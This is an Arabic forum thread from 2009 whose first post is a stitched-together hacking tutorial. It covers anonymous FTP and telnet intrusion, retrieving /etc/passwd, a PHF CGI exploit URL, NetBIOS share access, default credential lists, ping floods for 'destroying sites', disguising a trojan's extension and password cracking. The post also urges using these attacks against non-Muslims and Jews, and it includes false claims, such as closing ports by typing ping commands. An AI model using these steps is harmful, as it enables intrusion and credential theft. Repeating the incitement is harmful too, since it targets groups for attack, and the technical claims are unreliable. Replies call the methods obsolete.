دخول
×

حسابٌ واحد لجميع خدماتنا !





إنشاء حساب
نقطة التطوير - dev-point.com







حماية الأجهزة لمعرفة طرق اختراق الأجهزة والبرامج والحيل المستخدمة في ذلك [ يُمنع طرح أدوات وبرامج الاختراق ] . . .


 تم تحميل الصفحة في 0,9531612 ثانية

لاختراق عبر ftp
!  قم بقراءة قوانين الموقع قبل اضافة رد , اضغط هنا

LinkBack أدوات الموضوع انواع عرض الموضوع

  #1
AnTiviRus7
VIP DeveloPer
 
الصورة الرمزية AnTiviRus7
 
   تاريخ التسجيل: 23 - 7 - 2009
   رقم العضوية : 80105
   المشاركات : 8,279
   بمعدل : 4.31 يوميا
   نظام التشغيل : Windows 7
   عدد النقاط : 17369
   Allprograms7


AnTiviRus7 has a reputation beyond reputeAnTiviRus7 has a reputation beyond reputeAnTiviRus7 has a reputation beyond reputeAnTiviRus7 has a reputation beyond reputeAnTiviRus7 has a reputation beyond reputeAnTiviRus7 has a reputation beyond reputeAnTiviRus7 has a reputation beyond reputeAnTiviRus7 has a reputation beyond reputeAnTiviRus7 has a reputation beyond reputeAnTiviRus7 has a reputation beyond reputeAnTiviRus7 has a reputation beyond repute

AnTiviRus7 غير متواجد حالياً




افتراضي لاختراق عبر ftp قديم اضيفت بتاريخ 24-Jul-2009, 01:15 AM بواسطة WEB

*السلام عليكم ورحمة الله وبركاته هذه اول مشاركة لي في هذا المنتدى و ارجو ان تنال اعجابكم

الاختراق عبر ftp

سم الله الرحمن الرحيم

FTP:1
أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البورت
21
مفتوح و هو البورت الخاص بــ
FTP
و لتأكد من أن البورت مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من احسنها
Superscanne
بعدما تتأكد ان البورت مفتوح ننتقل الى الخطوة الثانية و هي
إضغط على
Start
ثم
Run
ثم اكتب
ftp –n
تطلع لك نافدة في الدوس مكتوب عليها
FTP>
لحد هنا كل شيء تمام
و بعدين اكتب
Open
ثم إضغط على
إدخال
Enter
تتحصل عب النتيجة التالية
FTP>
To
أكتب جنب
To
رقم IP الضحية ثم إضغط على إدخال
و الحين اهم شيء



أذا حصلت على هذا الرد فقد تخطيت خطوة
Connected to www.assassin.com
220 ***srv1 Microsoft FTP Service (Version 4.0).
و الآن أكتب الكتابة التالية
ftp>quote user ftp
أذا حصلت على هذا الرد فقد تخطيت خطوة
331 Anonymous acces allowed, send identify (e-mail name) as password.
و الآن أكتب الكتابة التالية
ftp>quote cwd ~root
أذا حصلت على هذا الرد فقد تخطيت خطوة
530 Please login with USER and PASS
ثم أكتب الكتابة التالية
ftp>quote pass ftp
أذا حصلت على هذا الرد فقد تخطيت خطوة
و نجحت في الإقتحام يعني الاختراق



230 Anonymous user logged in.
مبرووووك انت الحين في جهاز المسكين ذا الي بتحوسه
ما عليك الآن الا ان تقوم بإستعمال
2/اوامر الفتيبي

Pwd
لكي تعرف ما يحتويه الهارد ديسك
Cd
لإقتحام مجلد مثال
Cd black
في هدا المثال قمت بإقتحام مجلد المسمى بلاك
Ls
لكي يتضح لك محتوى المجلد أو الهارد ديسك
Get
لكي تحمل الى سطح المكتب من جهازك
مثال
Get black.exe
Put

العملية الع**ية ل
Get
يعني ان تأخد ملف من سطح المكتب من جهازك و تضعه في
في جهاز الضحية
مثال
Put black.exe
Clos
ل
قطع الإتصال مع الضحية




هذا أهم الأوامر والحين ابعلمكم على أنواع الرسائل الي نحصل عليها من جهاز الضحية مع تطبيق الأوامر و شرحها و ارقامها
Codes: Signification:
110 Restart marker reply.
120 Service ready in nnn minutes. (nnn est un temps)
125 Data connection already open; transfer starting.
150 File status okay; about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message.
215 NAME system type.
220 Service ready for new user.
221 Service closing control connection.
225 Data connection open; no transfer in progress.
226 Closing data connection.
227 Entering passive mode (h1, h2, h3, h4, p1, p2).
230 User logged in, proceed.
250 Requested file action okay, completed.
257 "PATHNAME" created.
331 User name okay, need password.
332 Need account for login.
350 Requested file action pendingfurther information.
421 Service not available, closing control connection.
425 Can't open data connection.
426 Connection closed; transfer aborded.
450 Requested file action not taken. (Fichier déjà utilisé par autre chose)
451 Requested action aborded: local error processing.
452 Requested action not taken. (Pas assez de mémoire pour exécuter l'action)
500 Syntax error, command unrecognized.
501 Syntax error in parameters or arguments.
502 Command not implemented.
503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.
532 Need account for storing files.
550 Requested action not taken. (Fichier non trouvé, pas d'accès possible,...)
551 Requested action aborded: page type unknown.
552 Requested file action aborded.
553 Requested action not taken. (Nom de fichier non attribué

لتدمير المواقع:
ping -t www.***.com
هذا الأمر يقوم بالضغط على المضيف
ping -t -a -f www.***.com
اهاه هذا الأمر الشاطر ويقوم باعطاء الاوامر للمستضيف
ping www.***.com
وهذا الأمر يقوم باعطاءك اي بي الموقع ويستخدم الاي بي للتدمير مثلاً بينج بعدها الاي بي
com/com.wav
com3/com3/.wav
com1/com.wav
و

2:هذا الاوامر للهجزم اكتب الموقع وهذا الامر ولا الاي بي يكون افضل
ping -w timeout www.***.com
وهذا الامر يستعمل لمعرفة سرعة المواقع
NETSTAT -S
هذي المنافذ في جهازك
NETSTAT -A
هذا الامر لترا المنافذ ومن مرتبط معك بالبروتكل يعني تشوف من يحاول يخترقك
NETSTAT -N
هذا الامر لأخراج الاي بي ارسل اي ملف لمن معاك على الماسنجر وهو يحمل اكتبة بيجيك الاي بي اخر شي على اليمين هذا هو واخر شي على اليسار يوو يعني انت
NETSTAT -P
هذا منافذ البروتكوكل
drwatson
هذا الامر لأخفاء الاي بي
والان هذا اوامر خطيرة
الإختراق عن طريق NetBios Attack

هذه الثغرة تظهر بصورة خاصة إذا ما كان لديك Home Network أو أى نوع اخر من أنواع الشبكات مثل LAN أو WAN أو MAN وغيرها ، أيضا يمكن إختراق حاسبك الشخصى إذا كانت لديك تلك الثغرة.
وللتجربة على نفسك كمثال : إحصل على IP الخاص بجهازك بواسطة ذلك البرنامج الصغير المحمل في المرفقات مثلا .
1- بعد حصولك على IP سيظهر بالشكل التالى 207.107.1.1 ( هذا الرقم إفتراضى).

2- الان إذهب الى START ثم RUN ثم إكتب CMD لتفتح لك شاشة الدوس .

3- إكتب داخل شاشة الدوس Nbtstat –A IP ADRESS : لا تنسى أن تكتب IP الخاص بك مكان IP ADRESS ، ثم إضغط ENTER .

4- سيظهر لك الجدول التالى :
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
-------------------------------------------
J-1 <00> UNIQUE Registered
WORK <00> GROUP Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
ملحوظة : تم حذف المعلومات الأصلية من الجدول .

5- الرقم الظاهر ما بين <> يطلق عليه HEX CODE VALUE ، وما يهمنا هنا أن نجد رقم 20 ما بين الأقواس وهذا يعنى أننا لدينا PRINTER OR FILES SHARED TURNED ON ، وهو ما يعنى أننا لدينا شخص لدية ملفات وطابعة يمكن مشاركتها عبر الإنترنت وهذا عيب خطير في أنظمة التشغيل وثغرة خطيرة يمكن إستغلالها في إختراقه.

6- الان يمكنك التعرف على الملفات التى يمكن مشاركتها أو التغيير فيها والتلاعب بها كيفما تشاء وذلك بكتابة الأمر التالى في شاشة الدوس:
Net view \\<insert ip_address here>

7- سوف يظهر لك الجدول التالى الذى يدل على وجود الملفات التى يمكن التلاعب فيها :
Shared resources at \\ip_address
Sharename Type Comment
MY ********S Disk
TEMP Disk

8- الان يمكنك الدخول الى ملف TEMP والتلاعب فيه :
Net use x: \\<insert IP address here>\temp

طبعا إسلوب NSETBIOS مر بالعديد من التطورات ، نظرا لأن العديد من المستخدمين وأنظمة التشغيل قد تلافوا هذه الثغرة الخطيرة لديهم ، بإذن الله سأقدم الطرق الأخرى الأكثر تطورا في وقت لاحق ..
* لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع

User name-Password

وهما يكونان محفوظين في ملف يسمي

PASSWD غالبا

بعض المواقع تضع هذا الملف في الإف تي بي

ما هو إف تي بي؟

FTP=File Transfer Protocol بروتوكول نقل الملفات

تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت

start==>run إبدأ ثم تشغيل

واكتب telnet

سيفتح التلنت اضغط علىRemote System ==> connect

ثم اكتب الموقع في Host Name مثلا

kahane.org أو الآيبي الخاص به

وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي

ثم اضغط connect

وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code

user anonymous

ثم انتر بعدها يطلب السيرفر كلمة السر اكتب

pass zzzoozz@yahoo.com

اكتب أي بريد ككلمة سر وطبعا سيكون وهميا

ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح..

بعدها سنحصل على ملف الباسوورد

قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل

cute ftp - ws_ftp

مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان

ftp.kahane.org

لتحصل على الملف في التلنت اكتب

retr /etc/passwd

/etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع

Sunos 5.0 etc/shadow او etc/passwd
Linux etc/shadow او etc/passwd
BSD4.3 –RENO etc/master.passwd
AIX etc/security/passwd
NT ويندوز scripts/passwd

وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl و غيرها
طريقة تغيير امتداد exe عن طريق الدوس جديد

اتبع الخطوات التالية:-
إبدأ>تشغيل>وأكتب command أو (start>runcopy server.exe server.com طبعا server هو اسم الباتش تبعك وممكن تغير الامتداد الى com,scr,bat إخواني المسلمين لاتستخدموا هذه الطريقة ضد إخوانكم المسلمين وانما استخدموها ضد الكفار كما هو هدف الموقع وبخوصا اليهود قاتلهم الله ولعنهم.

وهذي ارامر النت ستات مرة ثانية
مايتطسع فعله netstat

==============================================

NETSTAT حالة الشبكة يظهر جميع المنافذ المتصلة
NETSTAT مسافة-A يظهر ارقام الايبي المتصلة وحالتها
NETSTAT مسافة-E يظهر حالة الشبكة بشكل عام
NETSTAT مسافة-N يظهر ارقام البورتات والايبيات المتصلة
NETSTAT مسافة-P يظهر البروتوكولات المتصلة بجهازك
NETSTAT مسافة-R يظهر اجهزة الروترز في شبكتك
NETSTAT مسافة-S يظهر حالة الشبكة والاجهزة المتصلة

هذا اوامر للدخول الى جهاز الضحية:
FTP
أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البورت
21
مفتوح و هو البورت الخاص بــ
FTP
و لتأكد من أن البورت مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من احسنها
Superscanne
بعدما تتأكد ان البورت مفتوح ننتقل الى الخطوة الثانية و هي
إضغط على
Start
ثم
Run
ثم اكتب
ftp –n
تطلع لك نافدة في الدوس مكتوب عليها
FTP&g
لحد هنا كل شيء تمام
و بعدين اكتب
Open
ثم إضغط على
إدخال
Enter
تتحصل عب النتيجة التالية
FTP&g
To
أكتب جنب
To
رقم IP الضحية ثم إضغط على إدخال
و الحين اهم جزء

إدا تحصلت على هذا الرد فقد تخطيت خطوة
Connected to www.assassin.com
220 ***srv1 Microsoft FTP Service (Version 4.0).
و الآن أكتب الكتابة التالية
ftp&gquote user ftp
إدا تحصلت على هذا الرد فقد تخطيت خطوة
331 Anonymous acces allowed, send identify (e-mail name) as password.
و الآن أكتب الكتابة التالية
ftp&gquote cwd ~root
إدا تحصلت على هذا الرد فقد تخطيت خطوة
530 Please login with USER and PASS
ثم أكتب الكتابة التالية
ftp&gquote pass ftp
إدا تحصلت على هذا الرد فقد تخطيت خطوة
و نجحت في الإقتحام يعني الاختراق

230 Anonymous user logged in.
مبرووووك انت الحين في جهاز المسكين ذا الي بتحوسه
ما عليك الآن الا ان تقوم بإستعمال
اوامر الفتيبي
و طبعا لن امر عليها مرور الكرام لكي لا تقعو في المشكلة الي وقعت فيها و هي نجاح الإقتحام من دون ما أعرف و لا فكرة على اوامر الفتيبي و إذا اردتم ان تضحكو بقاليأكثر من 20 دقيقة و انا مجمد الإيدي و الضحية عالقة من دون أن أعمل أي شيء وعشان كذا
قمت وجبت الاوامرعشان تطبقوها مباشرةا بعد نجاح الاختراق

Pwd
لكي تعر ما يحتويه الهارد ديسك
Cd
لإقتحام مجلد مثال
Cd black
في هدا المثال قمت بإقتحام مجلد المسمى بلاك
Ls
لكي يتضح لك محتوى المجلد أو الهارد ديسك
Get
لكي تحمل الى سطح المكتب بتاع جهازك
مثال
Get black.exe
Put
العملية الع**ية ل
Get
يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في
في جهاز الضحية
مثال
Put black.exe
Clos
لقطع الإتصال مع الضحية


هذا أهم الأوامر والحين ابعلمكم على أنواع الرسائل الي نتحصل عليها من جهاز الضحية مع تطبيق الأوامر و شرحها و ارقامها
Codes: Signification:
110 Restart marker reply.
120 Service ready in nnn minutes. (nnn est un temps)
125 Data connection already open; transfer starting.
150 File status oka about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message.
215 NAME system type.
220 Service ready for new user.
221 Service closing control connection.
225 Data connection open; no transfer in progress.
226 Closing data connection.
227 Entering passive mode (h1, h2, h3, h4, p1, p2).
230 User logged in, proceed.
250 Requested file action okay, completed.
257 \"PATHNAME\" created.
331 User name okay, need password.
332 Need account for login.
350 Requested file action pendingfurther information.
421 Service not available, closing control connection.
425 Can\'t open data connection.
426 Connection closed; transfer aborded.
450 Requested file action not taken. (Fichier déjà utilisé par autre chose)
451 Requested action aborded: local error processing.
452 Requested action not taken. (Pas assez de mémoire pour exécuter l\'action)
500 Syntax error, command unrecognized.
501 Syntax error in parameters or arguments.
502 Command not implemented.
503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.
532 Need account for storing files.
550 Requested action not taken. (Fichier non trouvé, pas d\'accès possible,...)
551 Requested action aborded: page type unknown.
552 Requested file action aborded.
553 Requested action not taken. (Nom de fichier non attribué)
------------------------
اختراق الأجهزة :
ولها نفس الفكرة بحيث تقوم بالاتصال بجهاز على اساس انه سيرفر بإمكانك حذف إضافة إزالة الملفات فيه ...
تتم أيضا بنفس الطريقة من متصفحك اكتب Telnet://IPNumberort حيث أن IPNumber هو رقم الآي بي الخاص بالضحية اما port هو رقم المنفذ القابل لإجراء التيل نت عليه وهو يفترض أن يكون أحد المنافذ التالية :
21 - 25 - 32(الأساسي) - 99 - 2001
والعديد العديد من المنافذ الأخرى وهذه فقط على سبيل المثال
==================
3 ــ اختراق المواقع :
يجب أن يكون في الموقع منفذ قابل للتيل نت(قم باستخدام ShadowSecurityScanner لهذا الغرض) تجده في http://packetstorm.securify.com/ قم بالضغط على الوصلة التي سوف تظهر لك ثم ابحث عن البرنامج باسمه أو باسم SSS .
المهم بعد ما تتصل بالتيل نت للموقع حاول أن تدخل باي يوزنيم او باسوورد من التالية أو غيرها :
اسم المستخدم : كلمة المرور
anonymous : anonymous
guest : guest
root : root
sys : sys
sys : sysadm
sys : system
games : games
ftp : ftp
mail : ma
il
وإن لم تنجح(في حال كون نظام التشغيل في السيرفر ينو** Unix ويمكنك معرفته بواسطة البرنامج المذكورة أعلاه) جرب التالية :
young
test
لاحظ أنها غير محمية بكلمة سر وتسمى unpassworded accounts
أي الحسابات الغير محمية بكلمة سر .
اكتب الأمر :
GET /etc/passwd و GET /etc/group و GET /etc/shadow
ملاحظة : بعد كتابة كل أمر يجب أن تظيف :
data = download
لكي تتمكن من التحكم بالملفات .
===================================
ماهو الملف psswd ?
الملف ذا فضيحة فيه باسوورد صاحب الموقع ...وباسووردات غيرها بكثير من ظمنها باسوورد الـroot .
ملاحظة للمبتدئين : الـroot هو الشخص الذي يستطيع التحكم بكل شيء وتخريب وتدمير كل شيء من دون أن يوقفه النظام وبإمكانه أن يكون أي مستخدم على الشبكة بواسطة الأمر su username ولن يحتاج إلى باسوورد .
هذا الملف في ثلاث حالات :
1 ــ مغير اسمه وصعبة نبحث لان الملفات الموجودة في الملف etc/ كثيرة جدا .
2 ــ معمول له shadow وليس هناك طريقة لفك الـshadow أو ما يسمى بـunshadow .
3 ــ متروك مثل ما هو ..
لنفترض أنه كان في الحالة الثالثة هل ستجد الباسووردات بسهولة ؟؟ لا وألف لا
الباسووردات مشفرة ... سوف تراها كالمثال التالي :
sirhack:89fGc%^7&a, Ty:100:100: Sir Hackalot: /usr/sirhack:/bin/sh
هنا سوف نعرف المعلومات التالية:
1 ــ اسم المستخدم : sirhack .
2 ــ كلمة السر : 89fGc%^7 .
3 ــ الاسم الحقيقي : Sir Hackalot .
4 ــ مجلد الحساب : usr/sirhack/
5 ــ الغلاف(هنا الكلام في ينو** او لينو**) : bin/sh/
كما رأيتم فكلمة السر مشفرة .
===================================
ما هو الملف group ?
هذا الملف يحوي اسماء المستخدمين مع كلمة السر(مشفرة ثانية) وحالاته نفس حالات الملف passwd إلا أنه لا يغير تسميته .
===================================
ما هو الملف shadow ?
في حالة كون الملف psswd مشفر سوف نحتاج إلى هذا الملف لانه لن يكون مشفرا ...
===================================
كيف أفك التشفير ؟
استخدم أحد برنامجين :
1 ــ Cracker Jack .
2 ــ John the ripper .
وكلهما يوجد منهما نسخة لويندوز ونسخة للينو**(وينو**) ...

نسخة اللينو**
http://www.openwall.com/john/john-1.6.tar.gz

نسخة الويندوز
http://www.openwall.com/john/john-16w.zip

++++++++++++++++++++++++++++++++++++++++++++++++++


التل نت اداة فقط بس هذي الاداة ضرورية في كل شي المهم راح اشرح اليوم طريقة الاختراق جربتها مره وصارت
وهي تعتبر من اسهل طرق الاختراق
خلينا نفسم الدرس الى اربع اقسام

بسم الله بدانا
و إضغط enter ثم القسم الاول:
اول شي ضروري نعرف بعض الاوامر الليون** السهلة
HELP = HELP
COPY = CP
MOVE = MV
DIR = LS
DEL = RM
CD = CD
هذي مهمة جدا لنبدأ التعليم
واكو بعد WHO هذي اذا تعرف منو موجود على السيرفر وبعد اكو FINGER (اسم المستخدم) بين FINGER اسم المستخدم مسافة بدون الاقواس المهم ويا هذي الاوامر راح نقدر نتماشى ويا الدرس

القسم الثاني:
نظام اليون** او السيرفر مالته يحتفظ في كلمات السر في etc directory/ واسم الفايل passwd انته هسه تتوقع انك بس حصلت هذا الملف انتهى الموضوع وصرت هاكر لا
انته غلطان ميه بالميه لانو الباسيوردات مشفره ومستحيل تقدر تطلع الباسيورد منها
بس اكو حل اكو برنامج اسمه Cracker Jack هو مثل القاموس للتشفير يحتوي على الكثير من الباسيودات تقدرتنز http://www.geocities.com/SiliconValley/9185
وتقدر تحصل باسيوردات اكثر في sable.ox.ac.uk/pub/wordlists تنزله هو حوالي 4 ميجا بايت مظغوط يصير 8 ميجا بايت لاوم تحطه في ملف البرنامج


القسم الثالث(الاصعب):
النظام يحفظ الباسيوردات احنا ما نقدر ندخل على السيستم لانو احن مو مصرح لنا المهم شلون نجيب ملف الباسيورد في طريقتين سهلات بس احيانا تشتغل
اولها تدخل للسيستم كانك anonymously لما تدخل مرات ftpمايكون مانع الدخول لملف الباسيوردات انته عليك تسوي etc directory/ تشوف اذا الباسيورد عليها حظراو لا اذا
ماكو عليها حظر بسهولة نزل ملف الباسيورد وشغل البرنامج Cracker Jack وطلع الباسيورد ومبروكة عليك بس اذا جان عليها حظر لازم تجرب الخطة الثانية في ملفات اسمها PHF هذي تحوي على كل شي باسيوردات وملفات والتحكم

فانته شلون تدخل عليها تفتح الا**يبلوير
http://xxx.xxx.xxx/cgi-bin/phf?Qali...t%20/etc/passwd
ملاحظة بدال الا**ات تكتب عنوان الموقع انا نجحت بالدخول على موقع عن طريق هذا بالمناسبة تقدر تخترق منتدى عن طريق هذي الحركة
اذا ما نجحوا الحركيتن معناها الباسيورد مضلل يعني موجود هذا النظام لحفظ الباسيوردات اللي انته ما تقدر تدخل عليها بس ماكو شي مستحيل
مرات في بعض الانظمة يكون السيستم بيه backup للباسوردات وتقدر تبحث عنه مثلا في etc/shadow/ بس يمكن تشتغل ويمكن ما تشتغل انته وحظك
ولهذا السبب انا معجب جدا في نظام apache لانه نظام رائع جدا ولايمكن اختراقه بسهولة

الجزء الرابع:
زين هسه حصلت الباسيوردمال اليوزر نيم اللي تريد تخترقه شلون تقدر تاخذها الك؟؟
شوف
تفتح التل نت وتدخل على السيرفر وتكتب اليوزر نيم والباسيورد بعدني تقدرتسوي اللي يحلو لك طبعا لكل سيرفر اوامر يوجد امثلة على السيرفر

UNIX,linux, aix, irix, ultrix, bsd, or sometimes even DOS or Vax / Vms)



إغلاق المنافذ port الموجودة بالجهاز

اول شيء بقوله انه الكثير منا قد يتخوف من الهاكر واكثر البرنامج ( الفايرول ) الجدار الناري قد تفى بالغرض ولكن لو لم تستخدم بطريقه سليمه فيكون وجودها مثل عدمها ......

اقدم لكم هذه الطريقه التى عن طريقها تستطيع تقفيل جميع البورتات ( الثغرات الامنيه ) الموجوده بكل الاجهزه .


اتمنى اتباع الطريقه كما هي :
إدهب إلى:
Start&gRun ابداء &l تشغيل

واكتب الامر التالي
command.com

ستظهر لك نافذة إكتب فيها:
ping host


إنتظر و اكتب:
ping port


و إضغط enter

ثم إنتظر و اكتب:
ping port1027
وإضغط enter
و إنتظر ثم إكتب:
ping port80


و إضغط enter
ثم اكتب:
ping
و إضغط enter

ثم اكتب:
ping port
و إضغط enter


و الآن إنتهت المهمة.. لقد قمت بتقفيل بورت في ال الخاص بك و لقد تم منع دخول الهاكرز من تلك الثغرة الأمنية
  #2
Dr.ADeeB
VIP DeveloPer
 
الصورة الرمزية Dr.ADeeB
 
   تاريخ التسجيل: 23 - 8 - 2008
   رقم العضوية : 59617
   الدولة : Palestine
   المشاركات : 5,131
   بمعدل : 2.28 يوميا
   نظام التشغيل : Mac OS
   عدد النقاط : 11810


Dr.ADeeB has a reputation beyond reputeDr.ADeeB has a reputation beyond reputeDr.ADeeB has a reputation beyond reputeDr.ADeeB has a reputation beyond reputeDr.ADeeB has a reputation beyond reputeDr.ADeeB has a reputation beyond reputeDr.ADeeB has a reputation beyond reputeDr.ADeeB has a reputation beyond reputeDr.ADeeB has a reputation beyond reputeDr.ADeeB has a reputation beyond reputeDr.ADeeB has a reputation beyond repute

Dr.ADeeB غير متواجد حالياً




افتراضي رد: لاختراق عبر ftp قديم اضيفت بتاريخ 24-Jul-2009, 01:17 AM بواسطة WEB

مشكوور اخوي لكن الطريقة قديمة جدا

ونادر جدا تنجح
توقيع Dr.ADeeB


رحمة الله عليك يا "ألبتـار" سكنك الله فسيح جناته
Al-Battar آخر نشاط: 09-May-2012 12:43 AM
http://www.youtube.com/watch?v=a8VMkwecqo0
نحن هنا لنفيدكم ونحميكم,,,,لنعطيكم ونعلمكم
ولا نريد مقابل ذلك إلا"إحترامكم وتقديركم"

تم تحديث شروط المشاركة , يُرجى الاطّلاع من الجميع لبيئة تطويرية خالية من المؤرّقات
[ شروط المشاركة ]

  #3
Mr.dunhill
ExpErt DeveloPer
 
الصورة الرمزية Mr.dunhill
 
   تاريخ التسجيل: 21 - 6 - 2009
   رقم العضوية : 78243
   العمر : 23
   المشاركات : 4,284
   بمعدل : 2.19 يوميا
   عدد النقاط : 1213


Mr.dunhill has much to be proud ofMr.dunhill has much to be proud ofMr.dunhill has much to be proud ofMr.dunhill has much to be proud ofMr.dunhill has much to be proud ofMr.dunhill has much to be proud ofMr.dunhill has much to be proud ofMr.dunhill has much to be proud ofMr.dunhill has much to be proud of

Mr.dunhill غير متواجد حالياً




افتراضي رد: لاختراق عبر ftp قديم اضيفت بتاريخ 24-Jul-2009, 01:17 AM بواسطة WEB

أظن الطريقه قديمه وماعادت تنفع

تحياتي
  #4
MajestiC
" me myself AND I "
 
الصورة الرمزية MajestiC
 
   تاريخ التسجيل: 14 - 8 - 2007
   رقم العضوية : 29184
   المشاركات : 7,484
   بمعدل : 2.85 يوميا
   عدد النقاط : 1831


MajestiC has a brilliant futureMajestiC has a brilliant futureMajestiC has a brilliant futureMajestiC has a brilliant futureMajestiC has a brilliant futureMajestiC has a brilliant futureMajestiC has a brilliant futureMajestiC has a brilliant futureMajestiC has a brilliant futureMajestiC has a brilliant futureMajestiC has a brilliant future

MajestiC غير متواجد حالياً




افتراضي رد: لاختراق عبر ftp قديم اضيفت بتاريخ 24-Jul-2009, 01:23 AM بواسطة WEB

رتبّ الموضوع أكثر أخوي عشان نفهم ونتحمسّ معه
  #5
إًُسـَ‘ـﮯـَ‘ـمـًَ/ـﮯـَ‘ـرٍ
™ٌЄдЅMaя
 
الصورة الرمزية إًُسـَ‘ـﮯـَ‘ـمـًَ/ـﮯـَ‘ـرٍ
 
   تاريخ التسجيل: 21 - 10 - 2008
   رقم العضوية : 65702
   العمر : 25
   المشاركات : 3,585
   بمعدل : 1.63 يوميا
   عدد النقاط : 1339


إًُسـَ‘ـﮯـَ‘ـمـًَ/ـﮯـَ‘ـرٍ has much to be proud ofإًُسـَ‘ـﮯـَ‘ـمـًَ/ـﮯـَ‘ـرٍ has much to be proud ofإًُسـَ‘ـﮯـَ‘ـمـًَ/ـﮯـَ‘ـرٍ has much to be proud ofإًُسـَ‘ـﮯـَ‘ـمـًَ/ـﮯـَ‘ـرٍ has much to be proud ofإًُسـَ‘ـﮯـَ‘ـمـًَ/ـﮯـَ‘ـرٍ has much to be proud ofإًُسـَ‘ـﮯـَ‘ـمـًَ/ـﮯـَ‘ـرٍ has much to be proud ofإًُسـَ‘ـﮯـَ‘ـمـًَ/ـﮯـَ‘ـرٍ has much to be proud ofإًُسـَ‘ـﮯـَ‘ـمـًَ/ـﮯـَ‘ـرٍ has much to be proud ofإًُسـَ‘ـﮯـَ‘ـمـًَ/ـﮯـَ‘ـرٍ has much to be proud ofإًُسـَ‘ـﮯـَ‘ـمـًَ/ـﮯـَ‘ـرٍ has much to be proud of

إًُسـَ‘ـﮯـَ‘ـمـًَ/ـﮯـَ‘ـرٍ غير متواجد حالياً




افتراضي رد: لاختراق عبر ftp قديم اضيفت بتاريخ 24-Jul-2009, 01:25 AM بواسطة WEB

طريقة قديمة ومش شغالة

  #6
جُرعَة آمَل
.:: إداري قسم سابق ::.
.:: حسون آلعنزي ::.
 
الصورة الرمزية جُرعَة آمَل
 
   تاريخ التسجيل: 16 - 2 - 2009
   رقم العضوية : 72497
   الدولة : السعودية ، حفر الباطن
   المشاركات : 6,716
   بمعدل : 3.23 يوميا
   نظام التشغيل : Windows 7
   عدد النقاط : 4644
   gr3h.aml


جُرعَة آمَل has a reputation beyond reputeجُرعَة آمَل has a reputation beyond reputeجُرعَة آمَل has a reputation beyond reputeجُرعَة آمَل has a reputation beyond reputeجُرعَة آمَل has a reputation beyond reputeجُرعَة آمَل has a reputation beyond reputeجُرعَة آمَل has a reputation beyond reputeجُرعَة آمَل has a reputation beyond reputeجُرعَة آمَل has a reputation beyond reputeجُرعَة آمَل has a reputation beyond reputeجُرعَة آمَل has a reputation beyond repute

جُرعَة آمَل غير متواجد حالياً




افتراضي رد: لاختراق عبر ftp قديم اضيفت بتاريخ 24-Jul-2009, 01:39 AM بواسطة WEB

للأسف الطريقه مي شغاله

قديمة مره ..ْ}

توقيع جُرعَة آمَل

Back
To
Home
Soon

..

مواقع النشر (المفضلة)

الكلمات الدلالية (Tags)
لاختراق


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is في
كود HTML معطلة
Trackbacks are في
Pingbacks are في
Refbacks are في


Google+

الساعة الآن 02:16 PM

Powered by Devpoint, Inc. community
Copyrights for vBulletin Inc.
Devpoint v3.0 preview - Build 1402.11

نظام الترقية - الحسابات الموثوقة - خصوصية الموقع - [ Dev-PoinT ] - الأعلى




SEO by vBSEO 3.6.0 PL2 ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180